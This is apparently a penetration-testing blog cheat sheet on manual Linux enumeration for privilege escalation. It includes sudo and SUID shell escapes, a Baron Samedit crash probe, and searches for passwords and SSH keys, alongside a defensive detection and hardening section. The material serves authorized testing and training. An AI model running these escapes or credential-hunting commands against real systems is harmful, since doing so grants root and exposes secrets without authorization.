Linux Enumeration Cheat Sheet for Privilege Escalation

Linux Privesc
2026.02.13
Time it takes to read this article 6 minutes.

Introduction / Overview

You have a shell. It is unprivileged, noisy, and probably a half-broken dash with no TTY. The gap between that foothold and root is almost always closed by enumeration, not by some exotic 0-day. The boring id, uname -a, and sudo -l triad finds more boxes than any single CVE.

This article is a focused cheat sheet for the manual Linux enumeration that matters during privilege escalation. It is the workflow I run on every OSCP-style box and on real authorized engagements before reaching for automated tooling. We will cover identity and kernel context, sudo rights, SUID binaries, listening services, and running processes — the exact six checks that most frequently produce a path to root.

Legal / ethical disclaimer: Everything below is for education and for testing on systems you own or are explicitly authorized to assess (signed scope, lab VMs, CTFs). Running these techniques against systems you do not have written permission to test is illegal in most jurisdictions. Stay in scope.

How it works / Background

Privilege escalation on Linux exploits a misconfiguration or vulnerability that lets a low-privileged user execute code in a higher-privileged context. The common vectors are:

  • SUID/SGID binaries — files with the set-user-ID bit run as the file owner (often root) regardless of who launches them.
  • sudo misconfiguration — overly broad sudoers rules, or sudo CVEs like CVE-2021-3156 (Baron Samedit, heap overflow) and CVE-2019-14287 (!root runas bypass).
  • Kernel exploits — e.g. Dirty Pipe (CVE-2022-0847) or PwnKit/polkit (CVE-2021-4034), which depend on the exact kernel/distro version that uname -a reveals.
  • Exposed services — a database or admin daemon bound to 127.0.0.1 and running as root, surfaced by netstat/ss.
  • Credentials and cron — leaked secrets in process arguments visible to ps aux.

Enumeration is the act of mapping the host against these vectors quickly and systematically.

Prerequisites / Lab setup

You only need an unprivileged shell on a target. To practice safely, spin up a deliberately vulnerable VM:

# Any of these are ideal for practising the workflow below
# - TryHackMe "Linux PrivEsc"
# - VulnHub images (e.g. the "Kioptrix" series)
# - HackTheBox "Easy" Linux boxes
Bash

If your shell is not interactive, upgrade it first so that sudo, job control, and tab completion behave:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# then Ctrl-Z, `stty raw -echo; fg`, Enter, Enter
Bash

Attack walkthrough / PoC

1. Who am I and what kernel am I on

id              # uid, gid, and crucially the supplementary groups
whoami
uname -a        # kernel version, arch, hostname
cat /etc/os-release    # distro and version
Bash

id output like uid=1000(user) groups=1000(user),4(adm),27(sudo),999(docker) is gold: membership in docker, lxd, disk, or adm is often a direct root path. The uname -a string (e.g. Linux victim 5.8.0-43-generic ... x86_64) tells you whether kernel exploits like Dirty Pipe (fixed in 5.16.11/5.15.25/5.10.102) are viable. Always confirm a kernel exploit's preconditions before firing it — a panic ends your engagement.

2. Check sudo rights

sudo -l         # lists what the current user may run via sudo
Bash

This is the single highest-value command. Look for:

  • (ALL) NOPASSWD: /usr/bin/vim — abuse the program's shell escape (see GTFOBins).
  • env_keep entries like LD_PRELOAD or LD_LIBRARY_PATH — load a malicious shared object.
  • An old sudo version — test CVE-2021-3156:
sudo -V | head -1       # e.g. "Sudo version 1.8.31"
# Baron Samedit affects < 1.9.5p2; check then exploit if vulnerable
sudoedit -s '\' $(python3 -c 'print("A"*1000)')   # crash => likely vulnerable
Bash

A classic GTFOBins escape, when find is permitted via sudo:

sudo find . -exec /bin/sh \; -quit
Bash

3. Hunt SUID / SGID binaries

# SUID files owned by anyone, suppressing permission-denied noise
find / -perm -4000 -type f 2>/dev/null

# SGID
find / -perm -2000 -type f 2>/dev/null

# Both bits in one pass
find / -perm -u=s -o -perm -g=s -type f 2>/dev/null

# Capabilities (modern alternative to SUID)
getcap -r / 2>/dev/null
Bash

Cross-reference each non-standard result against GTFOBins. A SUID nmap, find, bash, cp, or a custom binary is frequently exploitable. Example for a SUID bash:

/usr/bin/bash -p     # -p preserves the effective uid -> euid root shell
Bash

4. Listening services and connections

netstat is deprecated on many distros; learn ss too:

netstat -tulnp 2>/dev/null    # TCP/UDP listening, numeric, with PID
ss -tulnp                     # modern equivalent
Bash

Pay attention to services bound to 127.0.0.1 — they are not reachable from your attack box but may run as root and be exploitable locally (e.g. a Redis on 6379, or an internal admin panel). Forward them out for inspection with SSH or chisel.

5. Running processes

ps aux                        # full process listing with users and args
ps aux | grep -i root         # what runs as root
ps -ef --forest               # parent/child tree
watch -n1 'ps -eo pid,user,cmd --sort=-pid | head'   # catch cron jobs
Bash

ps aux exposes command-line arguments — passwords passed via --password= or -p, paths to scripts that may be world-writable, and short-lived cron jobs. Combine with a watch loop or pspy to catch root cron tasks you can hijack.

6. Quick wins checklist

crontab -l; cat /etc/crontab; ls -la /etc/cron.*   # scheduled tasks
find / -writable -type d 2>/dev/null               # writable dirs
cat /etc/passwd; ls -la /home/*/.ssh 2>/dev/null   # users and keys
grep -RiIn "password" /etc /var/www 2>/dev/null     # leaked creds
mount; cat /etc/fstab                              # nfs no_root_squash, etc.
Bash

When you want to automate this baseline, LinPEAS runs all of the above and colour-codes likely wins — but always understand each finding manually first.

Mermaid diagram

Linux Enumeration Cheat Sheet for Privilege Escalation diagram 1

Text description: from an unprivileged shell, establish identity and kernel context, then branch through sudo rights, SUID/capabilities, exposed services and processes, and kernel exploits — any branch that hits a misconfiguration or known CVE leads to a root shell.

Detection & Defense (Blue Team)

Enumeration is itself an observable behaviour. Defenders should give mitigation equal weight to the offensive technique.

Detect the enumeration:

  • Filesystem-wide find scans (find / -perm -4000) are noisy. With auditd, watch for high-volume execve of find, getcap, and sudo -l from service accounts:
# auditd rule to log every execution of sudo -l style discovery
auditctl -a always,exit -F arch=b64 -S execve -F exe=/usr/bin/sudo -k sudo_exec
ausearch -k sudo_exec
Bash
  • Repeated sudo -l and reads of /etc/passwd, /etc/shadow, /etc/crontab map to MITRE ATT&CK T1033 (System Owner/User Discovery), T1082 (System Information Discovery), and T1518 (Software Discovery). EDR/Falco rules can alert on these patterns.

Reduce the attack surface:

  • Minimise SUID: audit with find / -perm -4000 yourself and strip the bit (chmod u-s) from anything that does not need it. Prefer file capabilities scoped tightly over blanket SUID.
  • Tighten sudoers: never grant NOPASSWD to interpreters or programs with shell escapes (vim, less, find, awk, nmap). Use visudo validation, Defaults !env_reset carefully, and avoid env_keep for LD_*.
  • Patch promptly: keep sudo, polkit, and the kernel current. PwnKit (CVE-2021-4034) and Baron Samedit (CVE-2021-3156) both have vendor patches; Dirty Pipe (CVE-2022-0847) is fixed in 5.16.11/5.15.25/5.10.102.
  • Hardening flags: mount /tmp, /var/tmp, and /dev/shm with nosuid,noexec,nodev; set no_root_squash off on NFS exports; restrict who can read process command lines with hidepid=2 on /proc.
  • Don't pass secrets on the command line: they leak via ps aux. Use environment files or secret stores instead.

For related lateral-movement and credential topics, see Linux SUID Privilege Escalation, Abusing sudo Misconfigurations, and Linux Kernel Exploits in Practice.

Conclusion

Privilege escalation rarely starts with an exploit; it starts with disciplined enumeration. Run the six checks — id, uname -a, sudo -l, SUID hunting, netstat/ss, and ps aux — in order, and you will surface the vast majority of misconfigurations that lead to root. Automated tools like LinPEAS accelerate this, but reading each finding by hand is what builds the instinct that wins boxes and real engagements. For defenders, the same list is a hardening checklist: shrink SUID, lock down sudoers, hide /proc, and patch the named CVEs.

References

Comments

Copied title and URL